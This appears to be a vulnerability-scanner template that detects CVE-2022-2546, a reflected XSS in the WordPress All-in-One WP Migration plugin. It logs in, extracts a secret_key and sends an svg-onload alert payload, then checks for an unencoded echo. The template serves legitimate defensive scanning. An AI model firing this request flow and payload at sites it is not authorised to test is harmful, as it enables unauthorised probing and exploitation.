# Detection template for CVE-2022-2546: reflected XSS in the WordPress
# All-in-One WP Migration plugin (versions <= 7.62, per the description below).
# The check is a three-request flow: log in, read the plugin's secret_key from
# the export page, then confirm that a marker string is echoed back unencoded
# in a response served as text/html.
# Remediation for a positive result: update the plugin to a release later
# than 7.62.
# NOTE(review): the flow logs in first and is tagged `authenticated`, while the
# Patchstack reference URL describes the issue as unauthenticated - confirm
# which precondition actually applies before relying on a negative result.
id: CVE-2022-2546

info:
  name: All-in-One WP Migration plugin - Cross-Site Scripting (XSS)
  author: theamanrawat
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) vulnerability in WordPress All-in-One WP Migration plugin (versions <= 7.62).
  reference:
    - https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58
    - https://wordpress.org/plugins/all-in-one-wp-migration/
    - https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2546
  # Only the CVE id is recorded; no CVSS or CWE fields are present here.
  classification:
    cve-id: CVE-2022-2546
  metadata:
    verified: true
  tags: cve,cve2022,wordpress,wp-plugin,wp,xss,all-in-one-wp-migration,authenticated

requests:
  - raw:
      # Request 1: WordPress login. {{username}} and {{password}} are not
      # defined in this template and must be supplied by the operator.
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      # Request 2: load the plugin's export page; the extractor below reads
      # secret_key from it.
      - |
        GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1
        Host: {{Hostname}}

      # Request 3: call the export AJAX action with the extracted secret_key
      # and a marker value in options[replace][new_value][].
      - |
        GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1
        Host: {{Hostname}}

    # Carry the session cookies set by request 1 into requests 2 and 3.
    cookie-reuse: true
    # Expose per-request variables (the *_3 names used by the matcher).
    req-condition: true
    # All three conditions must hold on response 3: it is served as text/html,
    # returns 200, and contains the marker unencoded inside the JSON
    # "new_value" array. The HTML content type is what makes the reflected
    # markup render in a browser, so a JSON content type or an encoded echo
    # does not match.
    matchers:
      - type: dsl
        dsl:
          - contains(all_headers_3, "text/html")
          - status_code_3 == 200
          - contains(body_3, '{\"new_value\":[\"XSSPAYLOAD<svg onload=alert(document.domain)>')
        condition: and

    # Captures the alphanumeric secret_key that follows "ai1wm_feedback" and
    # stores it as {{secretkey}} for request 3. `internal: true` keeps the
    # value as a template variable instead of reporting it in the results.
    extractors:
      - type: regex
        name: secretkey
        group: 1
        regex:
          - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
        internal: true